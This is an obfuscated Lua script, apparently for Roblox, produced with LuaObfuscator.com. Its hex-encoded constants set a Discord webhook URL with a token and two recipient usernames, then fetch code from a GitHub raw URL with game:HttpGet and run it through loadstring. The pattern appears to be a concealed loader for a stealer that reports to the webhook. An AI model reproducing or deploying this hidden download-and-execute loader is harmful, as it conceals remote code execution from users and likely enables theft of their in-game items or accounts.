--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v75=0;local v76;while true do if (v75==1) then return v76;end if (v75==0) then v76=v5(v69,v19);v19=nil;v75=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (1638 -(1523 + 114)))) ;return v70-(v70%((838 + 94) -(857 + (105 -31)))) ;else local v71=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=1065 -(67 + 1 + 997) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=1;end if (v34==(118 -(32 + 85))) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if ((1 + 0)==v38) then return (v42 * (30800116 -(10207115 + 3815785))) + (v41 * 65536) + (v40 * (189 + 67)) + v39 ;end if (v38==(350 -(87 + (1260 -(915 + 82))))) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;v38=2 -1 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + 0 ,(22 + 4) -6 ) * ((774 -(201 + 571))^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,47 -26 ,(1205 -(116 + 1022)) -36 );local v48=((v20(v44,6 + 26 )==(1 -0)) and  -(1 + 0)) or (792 -(368 + (1760 -1337))) ;if (v47==(0 -0)) then if (v46==(18 -(10 + 8))) then return v48 * (0 -0) ;else v47=(261 + 182) -(416 + 26) ;v45=0 -0 ;end elseif (v47==(879 + 1168)) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-(2509 -(998 + 488)) ) * (v45 + (v46/(((3 -2) + 1)^(184 -132)))) ;end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==((4071 -3211) -(814 + 45))) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=2;end if (v50==0) then v51=nil;if  not v49 then local v93=0 + 0 ;while true do if (v93==(0 + 0)) then v49=v23();if (v49==((349 + 536) -(261 + 624))) then return "";end break;end end end v50=1 -0 ;end if (v50==3) then return v6(v52);end if (v50==(1082 -(1020 + 60))) then v52={};for v77=1424 -(630 + 793) , #v51 do v52[v77]=v2(v1(v3(v51,v77,v77)));end v50=9 -6 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(1975 -(1913 + 62))) then v54=0;v55=nil;v53=1;end if (v53~=(2 + 1)) then else v60=nil;v61=nil;v53=4;end if (v53~=(5 -3)) then else v58=nil;v59=nil;v53=1936 -(565 + 1368) ;end if (v53~=(3 -2)) then else v56=nil;v57=nil;v53=2;end if (v53==4) then while true do if (1~=v54) then else local v96=0 + 0 ;while true do if (v96~=(1025 -(706 + 318))) then else v54=1253 -(721 + 530) ;break;end if (v96==0) then v57=nil;v58=nil;v96=1272 -(945 + 326) ;end end end if (v54==(858 -(564 + 292))) then local v97=0 -0 ;while true do if (1~=v97) then else v54=7 -4 ;break;end if (v97==(0 -0)) then v59=nil;v60=nil;v97=1 + 0 ;end end end if (v54~=(700 -(271 + 429))) then else local v98=0;while true do if (v98~=(1 + 0)) then else v54=1;break;end if (v98==(1500 -(1408 + 92))) then v55=0;v56=nil;v98=1087 -(461 + 625) ;end end end if (v54==3) then v61=nil;while true do local v99=1001 -(938 + 63) ;local v100;while true do if (v99~=(0 + 0)) then else v100=0;while true do if (v100==(1289 -(993 + 295))) then if (v55==(0 + 0)) then local v110=0 + 0 ;local v111;while true do if (v110==(0 + 0)) then v111=1171 -(418 + 753) ;while true do if ((1138 -(782 + 356))==v111) then local v178=0 + 0 ;while true do if (v178==(1 + 0)) then v111=268 -(176 + 91) ;break;end if (v178~=0) then else local v181=0;while true do if (v181==(0 + 0)) then v56={};v57={};v181=1 -0 ;end if (v181~=(1 + 0)) then else v178=1093 -(975 + 117) ;break;end end end end end if (v111~=(1876 -(157 + 1718))) then else v58={};v55=530 -(406 + 123) ;break;end end break;end end end if (v55==(1771 -(1749 + 20))) then local v112=0 + 0 ;while true do if (v112==(1322 -(1249 + 73))) then local v157=0 + 0 ;local v158;while true do if (v157==0) then v158=1145 -(466 + 679) ;while true do if (v158~=0) then else for v183=1,v60 do local v184=0 -0 ;local v185;local v186;local v187;while true do if (v184~=(2 -1)) then else v187=nil;while true do if (v185~=(2 -1)) then else if (v186==(2 -1)) then v187=v21()~=(1900 -(106 + 1794)) ;elseif (v186==(3 -1)) then v187=v24();elseif (v186~=(1 + 2)) then else v187=v25();end v61[v183]=v187;break;end if (0==v185) then local v198=0 + 0 ;local v199;while true do if (v198~=0) then else v199=0 -0 ;while true do if (0~=v199) then else local v205=0;while true do if ((2 -1)~=v205) then else v199=1228 -(322 + 905) ;break;end if (v205==0) then v186=v21();v187=nil;v205=2 -1 ;end end end if (v199~=(612 -(602 + 9))) then else v185=115 -(4 + 110) ;break;end end break;end end end end break;end if ((584 -(57 + 527))~=v184) then else v185=1427 -(41 + 1386) ;v186=nil;v184=104 -(17 + 86) ;end end end v59[950 -(245 + 702) ]=v21();v158=1 + 0 ;end if (1~=v158) then else v112=1 -0 ;break;end end break;end end end if (v112==(2 -1)) then for v160=1 + 0 ,v23() do local v161=166 -(122 + 44) ;local v162;local v163;local v164;while true do if (v161~=1) then else v164=nil;while true do if (0~=v162) then else local v188=0 -0 ;while true do if (1~=v188) then else v162=3 -2 ;break;end if (v188~=(0 + 0)) then else v163=0 -0 ;v164=nil;v188=3 -2 ;end end end if (v162~=(1 + 0)) then else while true do if (v163==(0 + 0)) then v164=v21();if (v20(v164,1 -0 ,1)==(65 -(30 + 35))) then local v191=0 -0 ;local v192;local v193;local v194;local v195;local v196;while true do if (v191~=(1 + 0)) then else local v200=0 + 0 ;while true do if (v200~=(1258 -(1043 + 214))) then else v191=2;break;end if (v200~=(0 -0)) then else v194=nil;v195=nil;v200=684 -(483 + 200) ;end end end if (v191==0) then local v201=1212 -(323 + 889) ;while true do if (v201==1) then v191=2 -1 ;break;end if (v201~=(0 -0)) then else v192=580 -(361 + 219) ;v193=nil;v201=1 -0 ;end end end if (v191~=(322 -(53 + 267))) then else v196=nil;while true do if (v192==(765 -(468 + 297))) then local v202=0;local v203;while true do if (v202~=(562 -(334 + 228))) then else v203=0;while true do if (1~=v203) then else v192=1;break;end if (v203==(0 + 0)) then v193=413 -(15 + 398) ;v194=nil;v203=983 -(18 + 964) ;end end break;end end end if (1==v192) then local v204=0 -0 ;while true do if (v204==(0 -0)) then v195=nil;v196=nil;v204=1 + 0 ;end if (v204==(1 + 0)) then v192=2;break;end end end if (v192==2) then while true do if (v193==(237 -(141 + 95))) then local v206=0;local v207;local v208;while true do if (v206==(0 + 0)) then v207=0 + 0 ;v208=nil;v206=851 -(20 + 830) ;end if (v206==(1 + 0)) then while true do if (v207~=(126 -(116 + 10))) then else v208=0 -0 ;while true do if (v208~=(1 + 0)) then else v193=2;break;end if (v208==(0 + 0)) then v196={v22(),v22(),nil,nil};if (v194==0) then local v217=0 + 0 ;local v218;while true do if ((163 -(92 + 71))==v217) then v218=0;while true do if (v218==(0 + 0)) then v196[3]=v22();v196[3 + 1 ]=v22();break;end end break;end end elseif (v194==(1 + 0)) then v196[7 -4 ]=v23();elseif (v194==(2 + 0)) then v196[7 -4 ]=v23() -((2 + 0)^16) ;elseif (v194==(1554 -(1126 + 425))) then local v227=405 -(118 + 287) ;local v228;local v229;while true do if (v227==0) then v228=0;v229=nil;v227=1;end if (v227==(1 -0)) then while true do if (v228~=0) then else v229=0 -0 ;while true do if (v229~=0) then else v196[1793 -(573 + 1217) ]=v23() -((1123 -(118 + 1003))^(46 -30)) ;v196[10 -6 ]=v22();break;end end break;end end break;end end end v208=378 -(142 + 235) ;end end break;end end break;end end end if (v193==(0 -0)) then local v209=0 + 0 ;while true do if (v209==(0 + 0)) then v194=v20(v164,979 -(553 + 424) ,942 -(714 + 225) );v195=v20(v164,7 -3 ,6);v209=1 + 0 ;end if (1==v209) then v193=1 + 0 ;break;end end end if (v193==(2 + 1)) then if (v20(v195,3,1 + 2 )==1) then v196[5 -1 ]=v61[v196[810 -(118 + 688) ]];end v56[v160]=v196;break;end if (v193==2) then local v211=0 + 0 ;local v212;while true do if (v211==(0 + 0)) then v212=0 -0 ;while true do if (v212==(2 -1)) then v193=10 -7 ;break;end if (v212~=(0 -0)) then else local v215=0 + 0 ;local v216;while true do if ((0 -0)==v215) then v216=753 -(239 + 514) ;while true do if (v216~=(1 + 0)) then else v212=2 -1 ;break;end if (v216==(285 -(175 + 110))) then if (v20(v195,1330 -(797 + 532) ,1 + 0 )~=(1 + 0)) then else v196[4 -2 ]=v61[v196[1204 -(373 + 829) ]];end if (v20(v195,1798 -(503 + 1293) ,2)==(2 -1)) then v196[3 + 0 ]=v61[v196[1064 -(810 + 251) ]];end v216=1;end end break;end end end end break;end end end end break;end end break;end end end break;end end break;end end break;end if (v161==(731 -(476 + 255))) then local v180=0;while true do if (v180==1) then v161=1131 -(369 + 761) ;break;end if (0~=v180) then else v162=0 + 0 ;v163=nil;v180=1 -0 ;end end end end end v55=3;break;end end end break;end if (v100~=(0 -0)) then else if (v55==(241 -(64 + 174))) then local v113=0;local v114;local v115;while true do if (v113==1) then while true do if (v114==0) then v115=0 + 0 ;while true do if (v115~=(0 -0)) then else for v189=337 -(144 + 192) ,v23() do v57[v189-1 ]=v28();end return v59;end end break;end end break;end if (v113~=(216 -(42 + 174))) then else v114=0;v115=nil;v113=860 -(240 + 619) ;end end end if (1==v55) then local v116=0;while true do if (v116~=(1 + 0)) then else v61={};v55=2 + 0 ;break;end if (v116~=(0 + 0)) then else local v159=0;while true do if ((1744 -(1344 + 400))~=v159) then else local v179=405 -(255 + 150) ;while true do if (v179==(1505 -(363 + 1141))) then v159=1 + 0 ;break;end if (v179==(0 -0)) then v59={v56,v57,nil,v58};v60=v23();v179=1;end end end if (v159~=1) then else v116=1 + 0 ;break;end end end end end v100=1740 -(404 + 1335) ;end end break;end end end break;end end break;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v95=0;while true do if (v95==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v83=v91[3];elseif (v92==1) then v89[v91[2]]=v91[3];else do return;end end elseif (v92<=3) then v89[v91[2]]=v64[v91[3]];elseif (v92>4) then v89[v91[2]]=v91[3]~=0 ;else local v120;local v121,v122;local v123;local v124;v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v124=v91[2];v123=v89[v91[3]];v89[v124 + 1 ]=v123;v89[v124]=v123[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v124=v91[2];v121,v122=v82(v89[v124](v13(v89,v124 + 1 ,v91[3])));v84=(v122 + v124) -1 ;v120=0;for v151=v124,v84 do v120=v120 + 1 ;v89[v151]=v121[v120];end v83=v83 + 1 ;v91=v79[v83];v124=v91[2];v89[v124]=v89[v124](v13(v89,v124 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end elseif (v92<=8) then if (v92<=6) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92==7) then local v137=v91[2];local v138,v139=v82(v89[v137](v13(v89,v137 + 1 ,v91[3])));v84=(v139 + v137) -1 ;local v140=0;for v154=v137,v84 do v140=v140 + 1 ;v89[v154]=v138[v140];end else local v141=v91[2];v89[v141]=v89[v141](v13(v89,v141 + 1 ,v84));end elseif (v92<=10) then if (v92>9) then v89[v91[2]][v91[3]]=v91[4];else local v145=0;while true do if (v145==2) then v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v145=3;end if (v145==1) then v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v145=2;end if (v145==4) then v83=v91[3];break;end if (v145==3) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v145=4;end if (v145==0) then v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v145=1;end end end elseif (v92>11) then v89[v91[2]]();else local v146=v91[2];local v147=v89[v91[3]];v89[v146 + 1 ]=v147;v89[v146]=v147[v91[4]];end v83=v83 + 1 ;break;end if (v95==0) then v91=v79[v83];v92=v91[1];v95=1;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31323431322O39323O393533343731342F6841616C71424E42494F425F36384736343648326F424B7865782D614A6B68557A5357612D753959743458702O436647496749317378574D5754315F46497033315A4D52030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503073O002077377368343203093O00557365724E616D6532030A3O006F70206469616D6F6E6400173O0012013O00013O0026063O000E0001000200044O000E0001001203000100033O00300400010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026063O00010001000100044O00010001001203000100033O0030090001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00023O00017O00",v9(),...);end
